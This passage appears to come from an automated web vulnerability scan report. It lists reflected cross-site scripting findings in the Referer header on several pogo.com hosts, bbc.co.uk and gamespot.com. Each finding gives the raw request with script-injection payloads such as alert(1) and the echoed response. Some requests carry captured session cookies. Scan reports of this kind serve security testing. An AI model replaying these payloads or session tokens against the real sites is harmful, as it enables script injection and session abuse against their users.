Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:15:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=10ba1</script><script>alert(1)</script>022d3a73fd9";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.653. http://puzzle-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7208c</script><script>alert(1)</script>8221f99fc9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7208c</script><script>alert(1)</script>8221f99fc9b

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=F3495FAC3BB07AB1DBDB2968D1EE0DD2.000224; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606252406912338; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:48 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:25:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 106833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=7208c</script><script>alert(1)</script>8221f99fc9b";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - puzzle";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:playersOnline::Unauth Category Page filter - puzzle:Non Authenticated";
s.prop
...[SNIP]...

3.654. http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/bejeweled2

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4af4</script><script>alert(1)</script>32744a0a28b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/bejeweled2 HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e4af4</script><script>alert(1)</script>32744a0a28b

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Set-Cookie: prod.JID=BDDA3B3FFD3F69512E0E994115DAAE19.000017; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606411320677332; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:52 GMT; Path=/
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:25:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e4af4</script><script>alert(1)</script>32744a0a28b";
s.eVar2="pogo";
s.pageName="Pogo Unauth o110272767 Log In Page";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:::Pogo Unauth o110272767 Log In Page:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

3.655. http://rss.pogo.com/rss [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rss.pogo.com
Path:	/rss

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb427</script><script>alert(1)</script>cea094aa600 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rss HTTP/1.1
Host: rss.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bb427</script><script>alert(1)</script>cea094aa600

Response

HTTP/1.1 404 /rss
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:26:15 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=bb427</script><script>alert(1)</script>cea094aa600";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.656. http://word-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538ca</script><script>alert(1)</script>81af36a11a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?pageSection=footer_word HTTP/1.1
Host: word-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=538ca</script><script>alert(1)</script>81af36a11a3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:29:31 GMT
Server: Apache-Coyote/1.1
Content-Length: 106184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=538ca</script><script>alert(1)</script>81af36a11a3";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - word";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_footer_word";
s.prop7="POGO:pogo:playersOnline::Unauth Category Page filter - word:Non
...[SNIP]...

3.657. http://word-games.pogo.com/games/scrabble [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/games/scrabble

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e47</script><script>alert(1)</script>9e203e837be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/scrabble HTTP/1.1
Host: word-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=68e47</script><script>alert(1)</script>9e203e837be

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:29:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 19628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=68e47</script><script>alert(1)</script>9e203e837be";
s.eVar2="pogo";
s.pageName="Unknown Country Room Selector Page";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:roomselector::Unknown Country Room Selector Page:Non Authenticated";
s.prop8="
...[SNIP]...

3.658. http://word-games.pogo.com/games/scrabble [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/games/scrabble

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9960f</script><script>alert(1)</script>42aee4319cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1
Host: word-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9960f</script><script>alert(1)</script>42aee4319cf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B

Response (redirected)

3.659. http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bbc.co.uk
Path:	/news/technology-12126880

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c325'-alert(1)-'53bf3b90fb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /news/technology-12126880 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c325'-alert(1)-'53bf3b90fb1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:39:11 GMT
Keep-Alive: timeout=10, max=798
Expires: Sun, 09 Jan 2011 01:39:11 GMT
Connection: close
Set-Cookie: BBC-UID=54edf269c181bb5f2b0def91d12b5d28582a0752a090616f227946e49e8ab87c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:39:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54edf269c181bb5f2b0def91d12b5d28582a0752a090616f227946e49e8ab87c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:39:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1294537151000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&q=6c325'-alert(1)-'53bf3b90fb1',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12126880',
       assetType: 'story',
       uri: '/news/techn
...[SNIP]...

3.660. http://www.gamespot.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gamespot.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db8c"><a>32f7510c149 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 3db8c"><a>32f7510c149

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:44:47 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:44:47 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQyOTEzMGZhZGMxZDZmM2I5YTg1Mjc5ODFlMQ%3D%3D; expires=Fri, 08-Jul-2011 01:44:47 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:44:47 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:44:47 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Keep-Alive: timeout=300, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 100485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
&ASSET_HOST=adimg.gamespot.com&PTYPE=2000&CNET-ONTOLOGY-NODE-ID=1&&&&POS=100&ENG:DATETIME=2011.01.08.20.44.47&SYS:RQID=01c13-ad-e6:4D290C226BC7F&&REFER_HOST=3db8c"><a>32f7510c149&&&&&&&adfile=7651/11/488167_wc.ca" width="880" height="150" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" allowtransparency="true" b
...[SNIP]...

3.661. http://www.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7731c</script><script>alert(1)</script>e18aafb3c6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=7731c</script><script>alert(1)</script>e18aafb3c6f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536387265-New%7C1297128387265%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:04:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 35192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=7731c</script><script>alert(1)</script>e18aafb3c6f";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.662. http://www.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f55a</script><script>alert(1)</script>4d32471be0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=7f55a</script><script>alert(1)</script>4d32471be0f

Response

3.663. http://www.pogo.com/account/my-account.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc5f7</script><script>alert(1)</script>82ec750f525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=bc5f7</script><script>alert(1)</script>82ec750f525
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 35390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=bc5f7</script><script>alert(1)</script>82ec750f525";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.664. http://www.pogo.com/account/my-account/confirm-recover-password.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/confirm-recover-password.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 990a5</script><script>alert(1)</script>ea916518bb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

